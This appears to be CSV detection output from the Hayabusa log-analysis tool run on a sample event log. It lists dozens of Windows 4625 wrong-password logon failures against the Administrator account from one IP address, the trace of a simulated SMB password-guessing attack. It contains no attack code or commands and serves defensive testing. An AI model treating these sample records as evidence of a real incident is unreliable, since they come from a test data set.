2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yqJarBVOImq5Tn2p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BZYExQroYH65tPuG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: llU5DQBrIrV3VtG5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HV17iXOYQqs2ntax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esZnEeyGdPa22PsL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rlYFTP9a2wdi5A2n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oJifU0PnO1Ntp6z3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGKdKjJy28Qd1whT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x3L4BYjYJYlvuYHE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ui5RoLKttDo0wfFJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G2xjdWobsxBjo6p7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TPeQ0M5lXITI84G3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uu72qx4lG5ZRM7xf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zD072YR1hIgbzjaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EqA7HDvImIlCiFq2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: efYFxZwMGEC3vVi7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6WmMHYegvFJvv6zd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DS9WkRnP0B5MgaeX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5jNPV7ZgFExgg9n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1FJ6vm3wK97iual  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GLuIx0sfF8NQD8QY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y3lMvcrrmGTkjdlh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ZqOabcNMeazs6TC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2AbE9D8PvuFDBz5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wzWdLEEc68ZvviGh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AtV3BuZiljbAeikO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tnKKfcwikNDdYOam  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jSbbzD7fpJY4Q1JL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gOASpLLE25ruCnGW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1jhUGOtszbPUwccL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yB8Mzo1RppdpLFKS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rOwoUlHGVeSbAhuN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BXIEHbkrjwedeaih  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OvsKoixgEzUgAyie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TzaZe6Y4Tdfjseuk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FEmbuU3CAC3CecZy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kfBmqmVPd0CGVUsD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Uz3TlU6yrcveM1w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z6hH6AkkgBFmeZ6u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J2J1W2WhA6Pj7j5j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: soHOxnkoOn7ot0My  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4c2oWI6mRIvSVSKq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FKsXD8aTyaC4fBqq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qrzji5ucmutsZNpo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BApOU105FCLwj4zn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EO50f7NfrrdwwCNA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PfTYbWC8IjW87th8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wLnE6zm5US4maK04  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5AV7taC7hYQdVjAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8MnnaSRs0bnYVlMX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YgqavZ1SuNvX7RgH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IQvoIsfW0LhDit2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 33IPGQXc1MarY30J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: II4Ly9LnkWlq60Ux  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wncfJC7kDSI7O9Ud  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6XzbWef3PuzQK3FJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5M5670HdNC6c8O56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ea8FcddgLyV5o6oL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LjyhmKFdBNrHIvTJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PIF47pEWBMp6Nbym  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6TO891WvJPkdjsct  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6cLnJYpHEzGAvhWG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gy6cFTrwrpRQFxfQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gxz612Z88PMCKzAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GSPC8hibdZdyOcex  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6vlmykLeFmuhn81B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4w4lEW9w53zMFPcc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jt2lDRFWwi6adwlB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G9MGvle35u5OGB5o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJgLFM2vrnKuj5N3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8HRyDAzwKj9bfnA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J65LcwnRgEob9wjY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yhas9e1fwDZ1Fxvt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
